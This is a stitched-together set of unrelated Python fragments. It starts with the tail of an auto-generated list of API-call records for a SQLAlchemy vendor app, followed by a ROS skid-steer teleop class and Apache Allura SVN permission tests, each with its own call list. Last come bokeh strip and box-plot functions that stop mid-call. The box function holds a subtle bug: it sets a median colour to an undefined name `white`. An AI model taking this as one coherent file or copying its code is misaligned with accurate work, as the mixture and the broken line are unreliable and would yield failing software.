current_quarteryear, users\n'), ((10659, 10689), 'sqlalchemy.desc', 'desc', (['suitemodules.update_date'], {}), '(suitemodules.update_date)\n', (10663, 10689), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((13882, 13934), 'models.category_names.query.filter_by', 'category_names.query.filter_by', ([], {'category_nameid': 'item'}), '(category_nameid=item)\n', (13912, 13934), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((23063, 23117), 'models.element_names.query.filter_by', 'element_names.query.filter_by', ([], {'element_nameid': 'item2[1]'}), '(element_nameid=item2[1])\n', (23092, 23117), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((23209, 23260), 'models.elementvariants.query.filter_by', 'elementvariants.query.filter_by', ([], {'variantid': 'item2[2]'}), '(variantid=item2[2])\n', (23240, 23260), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, 
category_names, element_names, elementvariants, current_quarteryear, users\n'), ((23350, 23401), 'models.elementvariants.query.filter_by', 'elementvariants.query.filter_by', ([], {'variantid': 'item2[2]'}), '(variantid=item2[2])\n', (23381, 23401), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((10268, 10315), 'models.vendors_rfi.query.filter_by', 'vendors_rfi.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (10295, 10315), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((10599, 10647), 'models.suitemodules.query.filter_by', 'suitemodules.query.filter_by', ([], {'suitemodid': 'item[1]'}), '(suitemodid=item[1])\n', (10627, 10647), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((13471, 13519), 'models.rfielements_providers.smce_id.in_', 'rfielements_providers.smce_id.in_', (['smce_ids_list'], {}), '(smce_ids_list)\n', (13504, 13519), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((13404, 13461), 'models.rfielements_providers.query.filter_by', 'rfielements_providers.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (13441, 13461), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((27306, 27345), 'sqlalchemy.desc', 'desc', (['rfielements_providers.update_date'], {}), '(rfielements_providers.update_date)\n', (27310, 27345), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((27725, 27763), 'sqlalchemy.desc', 'desc', (['rfielements_analysts.update_date'], {}), '(rfielements_analysts.update_date)\n', (27729, 27763), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((28756, 28795), 'sqlalchemy.desc', 'desc', (['rfielements_providers.update_date'], {}), '(rfielements_providers.update_date)\n', (28760, 28795), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((29175, 29213), 'sqlalchemy.desc', 'desc', (['rfielements_analysts.update_date'], {}), '(rfielements_analysts.update_date)\n', (29179, 29213), False, 'from sqlalchemy import desc, func, and_, or_\n'), ((27158, 27290), 'models.rfielements_providers.query.filter_by', 'rfielements_providers.query.filter_by', ([], {'vendor_id': 'vendorid', 'smce_id': 'item2[0]', 'quarter': 'current_quarter', 'year': 'current_year', 'round': '(1)'}), '(vendor_id=vendorid, smce_id=item2[0],\n quarter=current_quarter, year=current_year, round=1)\n', (27195, 27290), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((27578, 27709), 'models.rfielements_analysts.query.filter_by', 'rfielements_analysts.query.filter_by', ([], {'vendor_id': 'vendorid', 'smce_id': 'item2[0]', 'quarter': 
'current_quarter', 'year': 'current_year', 'round': '(1)'}), '(vendor_id=vendorid, smce_id=item2[0],\n quarter=current_quarter, year=current_year, round=1)\n', (27614, 27709), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((28608, 28740), 'models.rfielements_providers.query.filter_by', 'rfielements_providers.query.filter_by', ([], {'vendor_id': 'vendorid', 'smce_id': 'item2[0]', 'quarter': 'current_quarter', 'year': 'current_year', 'round': '(2)'}), '(vendor_id=vendorid, smce_id=item2[0],\n quarter=current_quarter, year=current_year, round=2)\n', (28645, 28740), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((29028, 29159), 'models.rfielements_analysts.query.filter_by', 'rfielements_analysts.query.filter_by', ([], {'vendor_id': 'vendorid', 'smce_id': 'item2[0]', 'quarter': 'current_quarter', 'year': 'current_year', 'round': '(2)'}), '(vendor_id=vendorid, smce_id=item2[0],\n quarter=current_quarter, year=current_year, round=2)\n', (29064, 29159), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((11506, 11553), 'models.vendors_rfi.query.filter_by', 'vendors_rfi.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (11533, 11553), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n'), ((11721, 11768), 'models.vendors_rfi.query.filter_by', 'vendors_rfi.query.filter_by', ([], {'vendor_id': 'vendorid'}), '(vendor_id=vendorid)\n', (11748, 11768), False, 'from models import vendors, rfielements_providers, rfielements_analysts, suitemodcatelem, vendors_rfi, suitemodules, suitemodcat, category_names, element_names, elementvariants, current_quarteryear, users\n')]
|
from command import Command
from utils import *
import rospy
from std_msgs.msg import String
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Joy, JointState
class SkidSteer(Command):
""" Control a model with a SkidSteer plugin """
def __init__(self, name, skid_steer_topic, speed=5, rot_multiplier=1, clamp_below=0.1):
""" Args:
speed: max speed
rot_multiplier: rotation multiplier
"""
super(SkidSteer, self).__init__(name)
self.pub = rospy.Publisher(skid_steer_topic, Twist, queue_size=10)
self.speed = speed
self.rot_multiplier = rot_multiplier
self.clamp_below = clamp_below
def evaluate_speed_rot(self, x, y):
rot = x*self.rot_multiplier
speed = y*self.speed
return (speed, rot)
def makemsg(self, speed, rot):
twist = Twist()
twist.linear.x = speed
twist.angular.z = rot
return twist
def oncallback(self, cmd_data):
x, y = cmd_data['x'], cmd_data['y']
x, y = clamp_center(x, self.clamp_below), clamp_center(y, self.clamp_below)
speed, rot = self.evaluate_speed_rot(x, y)
msg = self.makemsg(speed, rot)
self.pub.publish(msg)
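# A minimal usage sketch (illustrative; the node name, topic name and input
# values below are assumptions, not part of this module):
#
#   rospy.init_node('skid_steer_teleop')
#   cmd = SkidSteer('skid', '/cmd_vel', speed=2.0, rot_multiplier=0.5)
#   cmd.oncallback({'x': 0.0, 'y': 1.0})  # full speed ahead, no rotation
#   rospy.spin()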
|
[
"rospy.Publisher",
"geometry_msgs.msg.Twist"
] |
[((514, 569), 'rospy.Publisher', 'rospy.Publisher', (['skid_steer_topic', 'Twist'], {'queue_size': '(10)'}), '(skid_steer_topic, Twist, queue_size=10)\n', (529, 569), False, 'import rospy\n'), ((869, 876), 'geometry_msgs.msg.Twist', 'Twist', ([], {}), '()\n', (874, 876), False, 'from geometry_msgs.msg import Twist\n')]
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
from datadiff.tools import assert_equal
from allura.tests import TestController
from forgesvn.tests import with_svn
class TestSVNAuth(TestController):
@with_svn
def test_refresh_repo(self):
r = self.app.get('/auth/refresh_repo')
assert_equal(r.body, 'No repo specified')
r = self.app.get('/auth/refresh_repo/p/gbalksdfh')
assert_equal(r.body, 'No project at /p/gbalksdfh')
r = self.app.get('/auth/refresh_repo/p/test')
assert_equal(r.body, '/p/test does not include a repo mount point')
r = self.app.get('/auth/refresh_repo/p/test/blah/')
assert_equal(r.body, 'Cannot find repo at /p/test/blah')
r = self.app.get('/auth/refresh_repo/p/test/src/')
assert_equal(r.body,
'<Repository /tmp/svn/p/test/src> refresh queued.\n')
class TestSVNUserPermissions(TestController):
allow = dict(allow_read=True, allow_write=True, allow_create=True)
read = dict(allow_read=True, allow_write=False, allow_create=False)
disallow = dict(allow_read=False, allow_write=False, allow_create=False)
@with_svn
def test_list_repos(self):
r = self.app.get('/auth/repo_permissions',
params=dict(username='test-admin'), status=200)
assert_equal(json.loads(r.body), {"allow_write": [
'/svn/test/src',
]})
|
[
"json.loads",
"datadiff.tools.assert_equal"
] |
[((1164, 1205), 'datadiff.tools.assert_equal', 'assert_equal', (['r.body', '"""No repo specified"""'], {}), "(r.body, 'No repo specified')\n", (1176, 1205), False, 'from datadiff.tools import assert_equal\n'), ((1274, 1324), 'datadiff.tools.assert_equal', 'assert_equal', (['r.body', '"""No project at /p/gbalksdfh"""'], {}), "(r.body, 'No project at /p/gbalksdfh')\n", (1286, 1324), False, 'from datadiff.tools import assert_equal\n'), ((1388, 1455), 'datadiff.tools.assert_equal', 'assert_equal', (['r.body', '"""/p/test does not include a repo mount point"""'], {}), "(r.body, '/p/test does not include a repo mount point')\n", (1400, 1455), False, 'from datadiff.tools import assert_equal\n'), ((1525, 1581), 'datadiff.tools.assert_equal', 'assert_equal', (['r.body', '"""Cannot find repo at /p/test/blah"""'], {}), "(r.body, 'Cannot find repo at /p/test/blah')\n", (1537, 1581), False, 'from datadiff.tools import assert_equal\n'), ((1650, 1724), 'datadiff.tools.assert_equal', 'assert_equal', (['r.body', '"""<Repository /tmp/svn/p/test/src> refresh queued.\n"""'], {}), "(r.body, '<Repository /tmp/svn/p/test/src> refresh queued.\\n')\n", (1662, 1724), False, 'from datadiff.tools import assert_equal\n'), ((2205, 2223), 'json.loads', 'json.loads', (['r.body'], {}), '(r.body)\n', (2215, 2223), False, 'import json\n')]
|
import copy
import warnings
import numpy as np
import pandas as pd
import colorcet
import bokeh.models
import bokeh.plotting
import bokeh.transform
from . import utils
def strip(
data=None,
q=None,
cats=None,
q_axis="x",
palette=None,
order=None,
p=None,
show_legend=False,
color_column=None,
parcoord_column=None,
tooltips=None,
marker="circle",
jitter=False,
marker_kwargs=None,
jitter_kwargs=None,
parcoord_kwargs=None,
horizontal=None,
val=None,
**kwargs,
):
"""
Make a strip plot.
Parameters
----------
data : Pandas DataFrame, 1D Numpy array, or xarray
DataFrame containing tidy data for plotting. If a Numpy array,
a single category is assumed and a strip plot generated from
data.
q : hashable
Name of column to use as quantitative variable if `data` is a
Pandas DataFrame. Otherwise, `q` is used as the quantitative
axis label.
cats : hashable or list of hashables
Name of column(s) to use as categorical variable(s).
q_axis : str, either 'x' or 'y', default 'x'
Axis along which the quantitative value varies.
palette : list of strings of hex colors, or single hex string
If a list, color palette to use. If a single string representing
a hex color, all glyphs are colored with that color. Default is
colorcet.b_glasbey_category10 from the colorcet package.
order : list or None
If not None, must be a list of unique group names when the input
data frame is grouped by `cats`. The order of the list specifies
the ordering of the categorical variables on the categorical
axis and legend. If None, the categories appear in the order in
which they appeared in the inputted data frame.
p : bokeh.plotting.Figure instance, or None (default)
If None, create a new figure. Otherwise, populate the existing
figure `p`.
show_legend : bool, default False
If True, display legend.
color_column : hashable, default None
Column of `data` to use in determining color of glyphs. If None,
then `cats` is used.
parcoord_column : hashable, default None
Column of `data` to use to construct a parallel coordinate plot.
Data points with like entries in the parcoord_column are
connected with lines.
tooltips : list of 2-tuples
Specification for tooltips as per Bokeh specifications. For
example, if we want `col1` and `col2` tooltips, we can use
`tooltips=[('label 1': '@col1'), ('label 2': '@col2')]`.
marker : str, default 'circle'
        Name of marker to be used in the plot. Must be one of
        ['asterisk', 'circle', 'circle_cross',
'circle_x', 'cross', 'dash', 'diamond', 'diamond_cross', 'hex',
'inverted_triangle', 'square', 'square_cross', 'square_x',
'triangle', 'x']
jitter : bool, default False
If True, apply a jitter transform to the glyphs.
marker_kwargs : dict
Keyword arguments to pass when adding markers to the plot.
["x", "y", "source", "cat", "legend"] are note allowed because
they are determined by other inputs.
jitter_kwargs : dict
Keyword arguments to be passed to `bokeh.transform.jitter()`. If
not specified, default is
`{'distribution': 'normal', 'width': 0.1}`. If the user
specifies `{'distribution': 'uniform'}`, the `'width'` entry is
adjusted to 0.4.
horizontal : bool or None, default None
Deprecated. Use `q_axis`.
val : hashable
Deprecated, use `q`.
kwargs
Any kwargs to be passed to `bokeh.plotting.figure()` when
instantiating the figure.
Returns
-------
output : bokeh.plotting.Figure instance
Plot populated with a strip plot.
"""
# Protect against mutability of dicts
jitter_kwargs = copy.copy(jitter_kwargs)
marker_kwargs = copy.copy(marker_kwargs)
q = utils._parse_deprecations(q, q_axis, val, horizontal, "x")
if palette is None:
palette = colorcet.b_glasbey_category10
data, q, cats, show_legend = utils._data_cats(data, q, cats, show_legend, None)
cats, cols = utils._check_cat_input(
data, cats, q, color_column, parcoord_column, tooltips, palette, order, kwargs
)
grouped = data.groupby(cats, sort=False)
if p is None:
p, factors, color_factors = _cat_figure(
data, grouped, q, order, color_column, q_axis, kwargs
)
else:
if type(p.x_range) == bokeh.models.ranges.FactorRange and q_axis == "x":
raise RuntimeError("`q_axis` is 'x', but `p` has a categorical x-axis.")
elif type(p.y_range) == bokeh.models.ranges.FactorRange and q_axis == "y":
raise RuntimeError("`q_axis` is 'y', but `p` has a categorical y-axis.")
_, factors, color_factors = _get_cat_range(
data, grouped, order, color_column, q_axis
)
if tooltips is not None:
p.add_tools(bokeh.models.HoverTool(tooltips=tooltips))
if jitter_kwargs is None:
jitter_kwargs = dict(width=0.1, mean=0, distribution="normal")
elif type(jitter_kwargs) != dict:
raise RuntimeError("`jitter_kwargs` must be a dict.")
elif "width" not in jitter_kwargs:
if (
"distribution" not in jitter_kwargs
or jitter_kwargs["distribution"] == "uniform"
):
jitter_kwargs["width"] = 0.4
else:
jitter_kwargs["width"] = 0.1
if marker_kwargs is None:
marker_kwargs = {}
elif type(marker_kwargs) != dict:
raise RuntimeError("`marker_kwargs` must be a dict.")
if "color" not in marker_kwargs:
if color_column is None:
color_column = "cat"
marker_kwargs["color"] = bokeh.transform.factor_cmap(
color_column, palette=palette, factors=color_factors
)
if marker == "tick":
marker = "dash"
marker_fun = utils._get_marker(p, marker)
if marker == "dash":
if "angle" not in marker_kwargs and q_axis == "x":
marker_kwargs["angle"] = np.pi / 2
if "size" not in marker_kwargs:
if q_axis == "x":
marker_kwargs["size"] = p.plot_height * 0.25 / len(grouped)
else:
marker_kwargs["size"] = p.plot_width * 0.25 / len(grouped)
source = _cat_source(data, cats, cols, color_column)
if show_legend and "legend_field" not in marker_kwargs:
marker_kwargs["legend_field"] = "__label"
if q_axis == "x":
x = q
if jitter:
jitter_kwargs["range"] = p.y_range
y = bokeh.transform.jitter("cat", **jitter_kwargs)
else:
y = "cat"
p.ygrid.grid_line_color = None
else:
y = q
if jitter:
jitter_kwargs["range"] = p.x_range
x = bokeh.transform.jitter("cat", **jitter_kwargs)
else:
x = "cat"
p.xgrid.grid_line_color = None
if parcoord_column is not None:
source_pc = _parcoord_source(data, q, cats, q_axis, parcoord_column, factors)
if parcoord_kwargs is None:
line_color = "gray"
parcoord_kwargs = {}
elif type(parcoord_kwargs) != dict:
raise RuntimeError("`parcoord_kwargs` must be a dict.")
if "color" in parcoord_kwargs and "line_color" not in parcoord_kwargs:
line_color = parcoord_kwargs.pop("color")
else:
line_color = parcoord_kwargs.pop("line_color", "gray")
p.multi_line(
source=source_pc, xs="xs", ys="ys", line_color=line_color, **parcoord_kwargs
)
marker_fun(source=source, x=x, y=y, **marker_kwargs)
return p
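# A minimal usage sketch for strip() (illustrative; the DataFrame and column
# names below are assumptions, not part of this module):
#
#   import pandas as pd
#   df = pd.DataFrame({'treatment': ['a', 'a', 'b', 'b'],
#                      'signal': [1.1, 0.9, 2.3, 2.6]})
#   p = strip(data=df, q='signal', cats='treatment', jitter=True)
#   bokeh.plotting.show(p)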
def box(
data=None,
q=None,
cats=None,
q_axis="x",
palette=None,
order=None,
p=None,
whisker_caps=False,
display_points=True,
outlier_marker="circle",
min_data=5,
box_kwargs=None,
median_kwargs=None,
whisker_kwargs=None,
outlier_kwargs=None,
display_outliers=None,
horizontal=None,
val=None,
**kwargs,
):
"""
Make a box-and-whisker plot.
Parameters
----------
data : Pandas DataFrame, 1D Numpy array, or xarray
DataFrame containing tidy data for plotting. If a Numpy array,
a single category is assumed and a box plot with a single box is
generated from data.
q : hashable
Name of column to use as quantitative variable if `data` is a
Pandas DataFrame. Otherwise, `q` is used as the quantitative
axis label.
cats : hashable or list of hashables
Name of column(s) to use as categorical variable(s).
q_axis : str, either 'x' or 'y', default 'x'
Axis along which the quantitative value varies.
palette : list of strings of hex colors, or single hex string
If a list, color palette to use. If a single string representing
a hex color, all glyphs are colored with that color. Default is
colorcet.b_glasbey_category10 from the colorcet package.
order : list or None
If not None, must be a list of unique group names when the input
data frame is grouped by `cats`. The order of the list specifies
the ordering of the categorical variables on the categorical
axis and legend. If None, the categories appear in the order in
which they appeared in the inputted data frame.
p : bokeh.plotting.Figure instance, or None (default)
If None, create a new figure. Otherwise, populate the existing
figure `p`.
whisker_caps : bool, default False
If True, put caps on whiskers. If False, omit caps.
display_points : bool, default True
If True, display outliers and any other points that arise from
categories with fewer than `min_data` data points; otherwise
suppress them. This should only be False when using the boxes
as annotation on another plot.
outlier_marker : str, default 'circle'
        Name of marker to be used in the plot. Must be one of
        ['asterisk', 'circle', 'circle_cross',
'circle_x', 'cross', 'dash', 'diamond', 'diamond_cross', 'hex',
'inverted_triangle', 'square', 'square_cross', 'square_x',
'triangle', 'x']
min_data : int, default 5
Minimum number of data points in a given category in order to
make a box and whisker. Otherwise, individual data points are
plotted as in a strip plot.
box_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.hbar()` or
`p.vbar()` when constructing the boxes for the box plot.
median_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.hbar()` or
`p.vbar()` when constructing the median line for the box plot.
whisker_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.segment()`
when constructing the whiskers for the box plot.
outlier_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.circle()`
when constructing the outliers for the box plot.
horizontal : bool or None, default None
Deprecated. Use `q_axis`.
val : hashable
Deprecated, use `q`.
kwargs
        Kwargs that are passed to bokeh.plotting.figure() in constructing
the figure.
Returns
-------
output : bokeh.plotting.Figure instance
Plot populated with box-and-whisker plot.
Notes
-----
Uses the Tukey convention for box plots. The top and bottom of
the box are respectively the 75th and 25th percentiles of the
data. The line in the middle of the box is the median. The top
whisker extends to the maximum of the set of data points that are
less than 1.5 times the IQR beyond the top of the box, with an
analogous definition for the lower whisker. Data points not
between the ends of the whiskers are considered outliers and are
plotted as individual points.
"""
# Protect against mutability of dicts
box_kwargs = copy.copy(box_kwargs)
median_kwargs = copy.copy(median_kwargs)
whisker_kwargs = copy.copy(whisker_kwargs)
outlier_kwargs = copy.copy(outlier_kwargs)
q = utils._parse_deprecations(q, q_axis, val, horizontal, "x")
if display_outliers is not None:
warnings.warn(
f"`display_outliers` is deprecated. Use `display_points`. Using `display_points={display_outliers}.",
DeprecationWarning,
)
display_points = display_outliers
if palette is None:
palette = colorcet.b_glasbey_category10
data, q, cats, _ = utils._data_cats(data, q, cats, False, None)
cats, cols = utils._check_cat_input(
data, cats, q, None, None, None, palette, order, box_kwargs
)
if outlier_kwargs is None:
outlier_kwargs = dict()
elif type(outlier_kwargs) != dict:
raise RuntimeError("`outlier_kwargs` must be a dict.")
if box_kwargs is None:
box_kwargs = {"line_color": None}
box_width = 0.4
elif type(box_kwargs) != dict:
raise RuntimeError("`box_kwargs` must be a dict.")
else:
box_width = box_kwargs.pop("width", 0.4)
if "line_color" not in box_kwargs:
box_kwargs["line_color"] = None
if whisker_kwargs is None:
if "fill_color" in box_kwargs:
whisker_kwargs = {"line_color": box_kwargs["fill_color"]}
else:
whisker_kwargs = {"line_color": "black"}
elif type(whisker_kwargs) != dict:
raise RuntimeError("`whisker_kwargs` must be a dict.")
if median_kwargs is None:
median_kwargs = {"line_color": "white"}
elif type(median_kwargs) != dict:
raise RuntimeError("`median_kwargs` must be a dict.")
elif "line_color" not in median_kwargs:
median_kwargs["line_color"] = white
if q_axis == "x":
if "height" in box_kwargs:
warnings.warn("'height' entry in `box_kwargs` ignored; using `box_width`.")
del box_kwargs["height"]
else:
if "width" in box_kwargs:
warnings.warn("'width' entry in `box_kwargs` ignored; using `box_width`.")
del box_kwargs["width"]
grouped = data.groupby(cats, sort=False)
if p is None:
p, factors, color_factors = _cat_figure(
data, grouped, q, order, None, q_axis, kwargs
)
else:
_, factors, color_factors = _get_cat_range(data, grouped, order, None, q_axis)
marker_fun = utils._get_marker(p, outlier_marker)
source_box, source_outliers = _box_source(data, cats, q, cols, min_data)
if "color" in outlier_kwargs:
if "line_color" in outlier_kwargs or "fill_color" in outlier_kwargs:
raise RuntimeError(
"If `color` is in `outlier_kwargs`, `line_color` and `fill_color` cannot be."
)
else:
if "fill_color" in box_kwargs:
if "fill_color" not in outlier_kwargs:
outlier_kwargs["fill_color"] = box_kwargs["fill_color"]
if "line_color" not in outlier_kwargs:
outlier_kwargs["line_color"] = box_kwargs["fill_color"]
else:
if "fill_color" not in outlier_kwargs:
outlier_kwargs["fill_color"] = bokeh.transform.factor_cmap(
"cat", palette=palette, factors=factors
)
if "line_color" not in outlier_kwargs:
outlier_kwargs["line_color"] = bokeh.transform.factor_cmap(
"cat", palette=palette, factors=factors
)
if "fill_color" not in box_kwargs:
box_kwargs["fill_color"] = bokeh.transform.factor_cmap(
"cat", palette=palette, factors=factors
)
if q_axis == "x":
p.segment(
source=source_box,
y0="cat",
y1="cat",
x0="top",
x1="top_whisker",
**whisker_kwargs,
)
p.segment(
source=source_box,
y0="cat",
y1="cat",
x0="bottom",
x1="bottom_whisker",
**whisker_kwargs,
)
if whisker_caps:
p.hbar(
source=source_box,
y="cat",
left="top_whisker",
right="top_whisker",
height=box_width / 4,
**whisker_kwargs,
)
p.hbar(
source=source_box,
y="cat",
left="bottom_whisker",
right="bottom_whisker",
height=box_width / 4,
**whisker_kwargs,
)
p.hbar(
source=source_box,
y="cat",
left="bottom",
right="top",
height=box_width,
**box_kwargs,
)
p.hbar(
source=source_box,
y="cat",
left="middle",
right="middle",
height=box_width,
**median_kwargs,
)
if display_points:
marker_fun(source=source_outliers, y="cat", x=q, **outlier_kwargs)
p.ygrid.grid_line_color = None
else:
p.segment(
source=source_box,
x0="cat",
x1="cat",
y0="top",
y1="top_whisker",
**whisker_kwargs,
)
p.segment(
source=source_box,
x0="cat",
x1="cat",
y0="bottom",
y1="bottom_whisker",
**whisker_kwargs,
)
if whisker_caps:
p.vbar(
source=source_box,
x="cat",
bottom="top_whisker",
top="top_whisker",
width=box_width / 4,
**whisker_kwargs,
)
p.vbar(
source=source_box,
x="cat",
bottom="bottom_whisker",
top="bottom_whisker",
width=box_width / 4,
**whisker_kwargs,
)
p.vbar(
source=source_box,
x="cat",
bottom="bottom",
top="top",
width=box_width,
**box_kwargs,
)
p.vbar(
source=source_box,
x="cat",
bottom="middle",
top="middle",
width=box_width,
**median_kwargs,
)
if display_points:
marker_fun(source=source_outliers, x="cat", y=q, **outlier_kwargs)
p.xgrid.grid_line_color = None
return p
def stripbox(
data=None,
q=None,
cats=None,
q_axis="x",
palette=None,
order=None,
p=None,
show_legend=False,
top_level="strip",
color_column=None,
parcoord_column=None,
tooltips=None,
marker="circle",
jitter=False,
marker_kwargs=None,
jitter_kwargs=None,
parcoord_kwargs=None,
whisker_caps=True,
display_points=True,
min_data=5,
box_kwargs=None,
median_kwargs=None,
whisker_kwargs=None,
horizontal=None,
val=None,
**kwargs,
):
"""
Make a strip plot with a box plot as annotation.
Parameters
----------
data : Pandas DataFrame, 1D Numpy array, or xarray
DataFrame containing tidy data for plotting. If a Numpy array,
a single category is assumed and a strip plot generated from
data.
q : hashable
Name of column to use as quantitative variable if `data` is a
Pandas DataFrame. Otherwise, `q` is used as the quantitative
axis label.
cats : hashable or list of hashables
Name of column(s) to use as categorical variable(s).
q_axis : str, either 'x' or 'y', default 'x'
Axis along which the quantitative value varies.
palette : list of strings of hex colors, or single hex string
If a list, color palette to use. If a single string representing
a hex color, all glyphs are colored with that color. Default is
colorcet.b_glasbey_category10 from the colorcet package.
order : list or None
If not None, must be a list of unique group names when the input
data frame is grouped by `cats`. The order of the list specifies
the ordering of the categorical variables on the categorical
axis and legend. If None, the categories appear in the order in
which they appeared in the inputted data frame.
p : bokeh.plotting.Figure instance, or None (default)
If None, create a new figure. Otherwise, populate the existing
figure `p`.
top_level : str, default 'strip'
If 'box', the box plot is overlaid. If 'strip', the strip plot
is overlaid.
show_legend : bool, default False
If True, display legend.
color_column : hashable, default None
Column of `data` to use in determining color of glyphs. If None,
then `cats` is used.
parcoord_column : hashable, default None
Column of `data` to use to construct a parallel coordinate plot.
Data points with like entries in the parcoord_column are
connected with lines in the strip plot.
tooltips : list of 2-tuples
Specification for tooltips as per Bokeh specifications. For
example, if we want `col1` and `col2` tooltips, we can use
`tooltips=[('label 1': '@col1'), ('label 2': '@col2')]`.
marker : str, default 'circle'
Name of marker to be used in the plot (ignored if `formal` is
        False). Must be one of ['asterisk', 'circle', 'circle_cross',
'circle_x', 'cross', 'dash', 'diamond', 'diamond_cross', 'hex',
'inverted_triangle', 'square', 'square_cross', 'square_x',
'triangle', 'x']
jitter : bool, default False
If True, apply a jitter transform to the glyphs.
marker_kwargs : dict
Keyword arguments to pass when adding markers to the plot.
["x", "y", "source", "cat", "legend"] are note allowed because
they are determined by other inputs.
jitter_kwargs : dict
Keyword arguments to be passed to `bokeh.transform.jitter()`. If
not specified, default is
`{'distribution': 'normal', 'width': 0.1}`. If the user
specifies `{'distribution': 'uniform'}`, the `'width'` entry is
adjusted to 0.4.
whisker_caps : bool, default True
If True, put caps on whiskers. If False, omit caps.
min_data : int, default 5
Minimum number of data points in a given category in order to
make a box and whisker. Otherwise, individual data points are
plotted as in a strip plot.
box_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.hbar()` or
`p.vbar()` when constructing the boxes for the box plot.
median_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.hbar()` or
`p.vbar()` when constructing the median line for the box plot.
whisker_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.segment()`
when constructing the whiskers for the box plot.
horizontal : bool or None, default None
Deprecated. Use `q_axis`.
val : hashable
Deprecated, use `q`.
kwargs
Any kwargs to be passed to `bokeh.plotting.figure()` when
instantiating the figure.
Returns
-------
output : bokeh.plotting.Figure instance
Plot populated with a strip plot.
"""
# Protect against mutability of dicts
box_kwargs = copy.copy(box_kwargs)
median_kwargs = copy.copy(median_kwargs)
whisker_kwargs = copy.copy(whisker_kwargs)
jitter_kwargs = copy.copy(jitter_kwargs)
marker_kwargs = copy.copy(marker_kwargs)
parcoord_kwargs = copy.copy(parcoord_kwargs)
# Set defaults
if box_kwargs is None:
box_kwargs = dict(line_color="gray", fill_alpha=0)
if "color" not in box_kwargs and "line_color" not in box_kwargs:
box_kwargs["line_color"] = "gray"
if "fill_alpha" not in box_kwargs:
box_kwargs["fill_alpha"] = 0
if median_kwargs is None:
median_kwargs = dict(line_color="gray")
if "color" not in box_kwargs and "line_color" not in median_kwargs:
median_kwargs["line_color"] = "gray"
if whisker_kwargs is None:
whisker_kwargs = dict(line_color="gray")
if "color" not in box_kwargs and "line_color" not in whisker_kwargs:
whisker_kwargs["line_color"] = "gray"
if top_level == "box":
p = strip(
data=data,
q=q,
cats=cats,
q_axis=q_axis,
palette=palette,
order=order,
p=p,
show_legend=show_legend,
color_column=color_column,
parcoord_column=parcoord_column,
tooltips=tooltips,
marker=marker,
jitter=jitter,
marker_kwargs=marker_kwargs,
jitter_kwargs=jitter_kwargs,
parcoord_kwargs=parcoord_kwargs,
horizontal=horizontal,
val=val,
**kwargs,
)
p = box(
data=data,
q=q,
cats=cats,
q_axis=q_axis,
palette=palette,
order=order,
p=p,
display_points=False,
whisker_caps=whisker_caps,
min_data=min_data,
box_kwargs=box_kwargs,
median_kwargs=median_kwargs,
whisker_kwargs=whisker_kwargs,
horizontal=horizontal,
val=val,
)
elif top_level == "strip":
p = box(
data=data,
q=q,
cats=cats,
q_axis=q_axis,
palette=palette,
order=order,
p=p,
display_points=False,
whisker_caps=whisker_caps,
min_data=min_data,
box_kwargs=box_kwargs,
median_kwargs=median_kwargs,
whisker_kwargs=whisker_kwargs,
